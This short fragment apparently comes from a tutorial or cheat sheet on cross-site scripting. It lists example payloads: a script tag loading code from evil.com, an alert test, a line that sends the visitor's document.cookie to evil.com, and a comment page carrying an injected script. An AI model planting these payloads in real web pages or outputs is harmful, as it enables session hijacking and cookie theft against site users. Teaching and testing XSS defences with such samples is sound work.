<!-- External script --> <script src=http://evil.com/xss.js></script> <!-- Embedded script --> <script> alert("XSS"); </script>
<script> window.location="http://evil.com/?cookie=" + document.cookie </script>
<html> <h1>Most recent comment</h1> <script>doSomethingEvil();</script> </html>